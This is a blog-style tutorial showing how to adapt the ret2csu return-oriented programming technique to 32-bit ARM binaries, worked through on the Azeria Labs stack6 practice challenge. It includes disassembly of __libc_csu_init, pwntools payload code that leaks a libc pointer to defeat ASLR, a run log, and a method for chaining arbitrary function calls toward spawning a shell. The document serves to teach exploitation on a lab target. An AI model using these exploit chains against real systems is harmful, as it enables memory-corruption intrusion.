ret2csu ARM 32bit
Introduction
In this post I’ll show you how to port the ret2csu technique to ARM binaries. This technique allows a full ASLR bypass using only ROP gadgets found inside the binary itself. We will see that it also turns out to be a very effective way to chain ROP gadgets.
Background
My recent interest in ARM exploitation led me to the Azeria Labs tutorials on ARM assembly and ARM exploitation. They are really great for beginners: they teach the basics of memory corruption vulnerabilities, how to write ARM shellcode, and how to exploit stack and heap corruption vulnerabilities. There are also stack overflow challenges for getting used to the environment, the tools, and very basic exploitation techniques. The goal of the last challenge, called stack6, is:
Get control over PC and execute your shellcode using techniques like ret2libc or ROP
The solution is very straightforward and the tutorials give you everything you need to apply ret2libc (also called ret2zp, return to zero protection, on ARM).
The goal of ret2libc is to reuse libc code to eventually execute
system("/bin/sh\x00");
and get a shell. The generalization of this technique is ROP (Return Oriented Programming). As an exercise, I exploited the same stack6 challenge with a ROP chain in order to:
- call mprotect to set the stack as executable
- jump to my shellcode and get a shell.
While practicing with ROP on ARM, I realized that it’s not so straightforward to chain ROP gadgets. This article does a really good job of explaining how to do it, and I regret not finding it before banging my head against the problem and working it out by myself.
So far so good; let me recap what I learned with the tutorials and some exercises I made leveraging my knowledge of x86_64 exploitation:
- ARM assembly and shellcoding
- Basic stack overflow exploitation (no protections)
- ret2libc (or ret2zp) technique (NX protection bypass)
- very basic ROP exploitation (NX protection bypass)
What if there are more protections? Is ASLR turned on? If yes, is there a way to leak a libc pointer without relying on the program behaviour?
Can I use ROP to call functions with more than one parameter?
As it turns out, there is no easy answer to all those questions. At least, I wasn’t able to find answers online.
So I decided to investigate how __libc_csu_init works on Linux and whether it can be abused as we do on x86_64 binaries.
Before we start
I will not cover the basics here: I’m assuming you know advanced stack exploitation techniques on x86_64 and have a basic understanding of ARM assembly and its function calling convention.
ret2csu
If you get the stack6 executable and disassemble it, you can find the code of __libc_csu_init:
00010584 <__libc_csu_init>:
10584: e92d43f8 push {r3, r4, r5, r6, r7, r8, r9, lr}
10588: e1a07000 mov r7, r0
1058c: e59f604c ldr r6, [pc, #76] ; 105e0 <__libc_csu_init+0x5c>
10590: e59f504c ldr r5, [pc, #76] ; 105e4 <__libc_csu_init+0x60>
10594: e08f6006 add r6, pc, r6
10598: e08f5005 add r5, pc, r5
1059c: e0656006 rsb r6, r5, r6
105a0: e1a08001 mov r8, r1
105a4: e1a09002 mov r9, r2
105a8: ebffff63 bl 1033c <_init>
105ac: e1b06146 asrs r6, r6, #2
105b0: 08bd83f8 popeq {r3, r4, r5, r6, r7, r8, r9, pc}
105b4: e2455004 sub r5, r5, #4
105b8: e3a04000 mov r4, #0
105bc: e2844001 add r4, r4, #1
105c0: e5b53004 ldr r3, [r5, #4]!
105c4: e1a00007 mov r0, r7
105c8: e1a01008 mov r1, r8
105cc: e1a02009 mov r2, r9
105d0: e12fff33 blx r3
105d4: e1540006 cmp r4, r6
105d8: 1afffff7 bne 105bc <__libc_csu_init+0x38>
105dc: e8bd83f8 pop {r3, r4, r5, r6, r7, r8, r9, pc}
105e0: 0001009c muleq r1, ip, r0
105e4: 00010094 muleq r1, r4, r0
We can see that there are two interesting gadgets, right? Let’s start by analyzing the gadget at 0x105dc:
105dc: e8bd83f8 pop {r3, r4, r5, r6, r7, r8, r9, pc}
This gadget lets us fill r3, r4, r5, r6, r7, r8, r9 and the pc register with values taken from the stack. Taken alone it is of little use for calling a function: none of these registers holds a function argument, so the only one that matters is pc.
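To make the stack layout expected by this gadget explicit, here is a minimal sketch that decodes the register list straight from the instruction encoding shown in the disassembly. It relies on the fact that in an ARM load-multiple encoding the low 16 bits are a register bitmask, and that registers are loaded in ascending order from ascending addresses. The helper name `ldm_register_list` is my own, not part of any library.

```python
def ldm_register_list(encoding):
    """Return the registers named by the low 16 bits of an ARM LDM/POP encoding."""
    names = ["r%d" % i for i in range(13)] + ["sp", "lr", "pc"]
    mask = encoding & 0xFFFF  # bit N set means register N is in the list
    return [names[bit] for bit in range(16) if mask & (1 << bit)]


# Encoding of the instruction at 0x105dc, taken from the disassembly.
regs = ldm_register_list(0xE8BD83F8)

# The lowest-numbered register is loaded from the lowest address,
# so this is also the order in which the payload words must be laid out.
for offset, reg in zip(range(0, 4 * len(regs), 4), regs):
    print("[sp+0x%02x] -> %s" % (offset, reg))
```

The word at the top of the stack ends up in r3 and the eighth word ends up in pc, which is the order used when building the payload.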
But there is another gadget at 0x105c4 which, combined with the previous one, becomes pretty interesting:
105c4: e1a00007 mov r0, r7
105c8: e1a01008 mov r1, r8
105cc: e1a02009 mov r2, r9
105d0: e12fff33 blx r3
Notice how r7, r8 and r9 are moved into r0, r1 and r2 respectively. Under the ARM calling convention, those three registers hold the first three parameters of a function.
The gadget ends by branching (with link and exchange) to the address written inside r3 (which we also control).
By combining these two gadgets we can call an arbitrary function with up to three parameters:
- Fill r7, r8 and r9 with the three parameters (the second gadget copies them into r0, r1 and r2)
- Fill r3 with the address of the function
Let’s see how this works, with the following Python code:
...
pop_many = p32(0x105dc)        # pop {r3, r4, r5, r6, r7, r8, r9, pc}
mov_and_blx = p32(0x000105c4)  # mov r0, r7; mov r1, r8; mov r2, r9; blx r3

def ret2csu(r0, r1, r2, call):
    payload = b""
    payload += pop_many
    payload += p32(call)     # r3: function to call
    payload += p32(0xAA)     # r4: junk
    payload += p32(0xBB)     # r5: junk
    payload += p32(0xCC)     # r6: junk
    payload += p32(r0)       # r7 -> r0
    payload += p32(r1)       # r8 -> r1
    payload += p32(r2)       # r9 -> r2
    payload += mov_and_blx   # pc
    return payload

EIP_OFFSET = 0xYY  # placeholder: offset of the saved return address
payload = b""
payload += b"A"*EIP_OFFSET
# write(1, &got['write'], 4): print the resolved libc address of write
payload += ret2csu(0x1, elf.got['write'], 0x4, elf.symbols['write'])
p.sendline(payload)
p.recvline()
leak = u32(p.recv(4))
log.success("Leaked: {}".format(hex(leak)))
gbyolo@kalimero: bof [master]× » python exploit_ret2csu.py
[*] '/opt/shared/asm/arm/bof/elf'
Arch: arm-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x10000)
RWX: Has RWX segments
[+] Connecting to 127.0.0.1 on port 5022: Done
[*] pi@127.0.0.1:
Distro Raspbian 10
OS: linux
Arch: Unknown
Version: 4.19.50
ASLR: Enabled
Note: Susceptible to ASLR ulimit trick (CVE-2016-3672)
[+] Starting remote process b'/home/pi/arm/elf' on 127.0.0.1: pid 447
[+] Leaked: 0xb6e14430
We successfully called write and leaked a libc pointer without relying on the program behaviour itself: whatever the program does, ret2csu works as long as the binary contains __libc_csu_init and imports a function such as write.
This enables a full ASLR bypass, so a second stage payload would just execute either system or execve, or whatever else you like.
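As a rough sketch of what the second stage would start from, the snippet below turns the leaked address into a libc base and then into the address of system. The two offsets are hypothetical placeholders chosen for illustration only; the real values must be read from the libc actually used by the target. The helper name `libc_base_from_leak` is also my own.

```python
import struct


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Subtract the symbol's offset inside libc from its leaked runtime address."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        # A mapped library starts on a page boundary; anything else
        # suggests the wrong libc or the wrong offset.
        raise ValueError("libc base 0x%x is not page aligned" % base)
    return base


# HYPOTHETICAL offsets, for illustration only: take the real ones
# from the target's libc.
WRITE_OFFSET = 0x000C4430
SYSTEM_OFFSET = 0x00037154

# The four bytes as they would arrive from write(1, &got['write'], 4).
raw = struct.pack("<I", 0xB6E14430)
leak = struct.unpack("<I", raw)[0]

base = libc_base_from_leak(leak, WRITE_OFFSET)
system_addr = base + SYSTEM_OFFSET
print("libc base: 0x%08x" % base)
print("system:    0x%08x" % system_addr)
```

With pwntools the same arithmetic is usually done by loading the target's libc as an `ELF` object and assigning the computed base to its `address` attribute, after which symbol lookups return runtime addresses.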
Arbitrary ROP chaining
If you look carefully at the ROP gadgets we used, you will notice that they can be chained in a circular way, which lets us chain arbitrary function calls much like in an x86_64 ROP chain.
Let’s call POP_MANY the gadget at 0x105dc and MOV_AND_BLX the gadget at 0x105c4. The ret2csu attack consists of executing first POP_MANY and then MOV_AND_BLX.
105c4: e1a00007 mov r0, r7
105c8: e1a01008 mov r1, r8
105cc: e1a02009 mov r2, r9
105d0: e12fff33 blx r3
105d4: e1540006 cmp r4, r6
105d8: 1afffff7 bne 105bc <__libc_csu_init+0x38>
105dc: e8bd83f8 pop {r3, r4, r5, r6, r7, r8, r9, pc}
The last instruction of MOV_AND_BLX is our function call, invoked with a blx ARM instruction, which saves the address of the next instruction (i.e. 0x105d4) in the link register (lr) before actually jumping. In this way, when the function returns, the code will jump back to this __libc_csu_init code:
105d4: e1540006 cmp r4, r6
105d8: 1afffff7 bne 105bc <__libc_csu_init+0x38>
105dc: e8bd83f8 pop {r3, r4, r5, r6, r7, r8, r9, pc}
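The registers r4 and r6 are compared and, if they are equal, the bne is not taken and execution falls through to POP_MANY, so we can still redirect the execution flow. Can we control r4 and r6 such that they contain the same value after blx r3? Of course! We executed the POP_MANY gadget before in order to fill r7, r8 and r9 (copied into r0, r1 and r2), but we also filled r4, r5 and r6 with junk values, so we only need to give r4 and r6 the same value. Both are callee-saved registers under the ARM calling convention, so the called function is expected to return with them unchanged.
The updated ret2csu function is the following: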
def ret2csu(r0, r1, r2, call, chain=False):
    payload = b""
    # When chaining, the previous call already falls through to POP_MANY
    if not chain:
        payload += pop_many
    payload += p32(call)     # r3
    payload += p32(0x0)      # r4
    payload += p32(0x0)      # r5
    payload += p32(0x0)      # r6. Set equal to r4
    payload += p32(r0)       # r7 -> r0
    payload += p32(r1)       # r8 -> r1
    payload += p32(r2)       # r9 -> r2
    payload += mov_and_blx   # pc
    return payload
We can now build a ROP chain like this:
payload += ret2csu(0x1, elf.got['write'], 0x4, elf.symbols['write'])
payload += ret2csu(0, 0, 0, elf.symbols['main'], chain=True)
payload += ret2csu(...)
payload += ret2csu(...)
And thus call as many functions as we want.
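To check the chaining logic without a target, here is a small sketch that walks a payload the way the CPU would and records each call. It is a toy model, not an emulator: it knows only the two gadgets, and it assumes each called function returns to lr and preserves r4 to r9. The addresses FUNC_A, FUNC_B and GOT_ENTRY are hypothetical, and p32 is reimplemented with struct so the block does not need pwntools.

```python
import struct

POP_MANY = 0x105DC     # pop {r3, r4, r5, r6, r7, r8, r9, pc}
MOV_AND_BLX = 0x105C4  # mov r0, r7; mov r1, r8; mov r2, r9; blx r3


def p32(value):
    """Pack a 32-bit little-endian word (stand-in for pwntools' p32)."""
    return struct.pack("<I", value)


def ret2csu(r0, r1, r2, call, chain=False):
    words = [] if chain else [POP_MANY]
    words += [call, 0, 0, 0, r0, r1, r2, MOV_AND_BLX]  # r3..r9, pc
    return b"".join(p32(w) for w in words)


def emulate(payload):
    """Return the (function, r0, r1, r2) calls the payload would perform."""
    stack = list(struct.unpack("<%dI" % (len(payload) // 4), payload))
    regs, calls = {}, []
    pc = stack.pop(0)  # the overwritten return address
    while True:
        if pc == POP_MANY:
            if len(stack) < 8:
                break  # payload exhausted
            for name in ("r3", "r4", "r5", "r6", "r7", "r8", "r9", "pc"):
                regs[name] = stack.pop(0)
            pc = regs["pc"]
        elif pc == MOV_AND_BLX:
            calls.append((regs["r3"], regs["r7"], regs["r8"], regs["r9"]))
            # ASSUMPTION: the callee returns to lr (0x105d4) with r4-r9 intact.
            if regs["r4"] != regs["r6"]:
                raise RuntimeError("bne taken: execution loops back to 0x105bc")
            pc = POP_MANY  # cmp r4, r6 is equal, so fall through to the pop
        else:
            break  # an address this toy model does not know
    return calls


# HYPOTHETICAL addresses, for illustration only.
FUNC_A, FUNC_B, GOT_ENTRY = 0x10350, 0x10360, 0x2100C

payload = ret2csu(1, GOT_ENTRY, 4, FUNC_A)
payload += ret2csu(0, 0, 0, FUNC_B, chain=True)
calls = emulate(payload)
for func, a0, a1, a2 in calls:
    print("call 0x%x(0x%x, 0x%x, 0x%x)" % (func, a0, a1, a2))
```

One consequence the model makes visible: after the last call returns, POP_MANY runs once more and pops eight words from whatever follows the payload on the stack. It therefore seems safest to end the chain with a function that does not return into the gadget (such as restarting main or calling execve), or to append eight more controlled words.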
2020-07-13